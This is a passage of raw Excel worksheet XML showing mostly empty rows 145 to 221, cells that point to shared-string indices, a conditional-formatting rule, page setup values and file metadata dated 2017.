    <row r="145" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="F145" s="8"/>
    </row>
    <row r="146" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="E146" s="8"/>
      <c r="F146" s="8"/>
    </row>
    <row r="147" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="148" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="149" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="150" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="D150" s="4"/>
    </row>
    <row r="151" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="152" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="153" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="154" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="155" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A155" s="4" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="156" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="157" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A157" s="19" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="158" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="159" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="160" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="161" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="162" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="163" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="164" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="165" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="166" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="167" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="168" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="169" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="170" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A170" s="8"/>
    </row>
    <row r="171" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A171" s="4"/>
    </row>
    <row r="172" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A172" s="4"/>
    </row>
    <row r="173" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A173" s="4"/>
    </row>
    <row r="174" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="175" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="176" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="177" customFormat="1" ht="15" customHeight="1"/>
    <row r="178" customFormat="1" ht="15" customHeight="1"/>
    <row r="179" customFormat="1" ht="15" customHeight="1"/>
    <row r="180" customFormat="1" ht="15" customHeight="1"/>
    <row r="181" customFormat="1" ht="15" customHeight="1"/>
    <row r="182" customFormat="1" ht="15" customHeight="1"/>
    <row r="183" customFormat="1" ht="15" customHeight="1"/>
    <row r="184" customFormat="1" ht="15" customHeight="1"/>
    <row r="185" customFormat="1" ht="15" customHeight="1"/>
    <row r="186" customFormat="1" ht="15" customHeight="1"/>
    <row r="187" customFormat="1" ht="15" customHeight="1"/>
    <row r="188" customFormat="1" ht="15" customHeight="1"/>
    <row r="189" customFormat="1" ht="15" customHeight="1"/>
    <row r="190" customFormat="1" ht="15" customHeight="1"/>
    <row r="191" customFormat="1" ht="15" customHeight="1"/>
    <row r="192" customFormat="1" ht="15" customHeight="1"/>
    <row r="193" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="194" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="195" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="196" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="197" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="198" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="199" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="200" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="201" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="202" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="203" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="204" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="205" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="206" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="207" spans="6:6" customFormat="1" ht="15" customHeight="1">
      <c r="F207" s="4"/>
    </row>
    <row r="208" spans="6:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="209" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A209" s="8" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="210" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A210" s="4" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="211" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A211" s="18" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="212" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="213" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A213" s="4" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="214" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A214" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="215" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
    <row r="216" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A216" s="4" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="217" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A217" s="4" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="218" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A218" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="219" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A219" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="220" spans="1:1" customFormat="1" ht="15" customHeight="1">
      <c r="A220" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="221" spans="1:1" customFormat="1" ht="15" customHeight="1"/>
  </sheetData>
  <conditionalFormatting sqref="A101:A102 E90">
    <cfRule type="duplicateValues" dxfId="0" priority="5"/>
  </conditionalFormatting>
  <pageMargins left="0.1" right="0.1" top="0.1" bottom="0.1" header="0" footer="0"/>
  <pageSetup orientation="portrait" horizontalDpi="0"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0</dc:creator>
  <cp:lastModifiedBy>Ao Shen</cp:lastModifiedBy>
  <cp:lastPrinted>2017-02-09T21:04:46Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-05T07:10:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-09T21:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>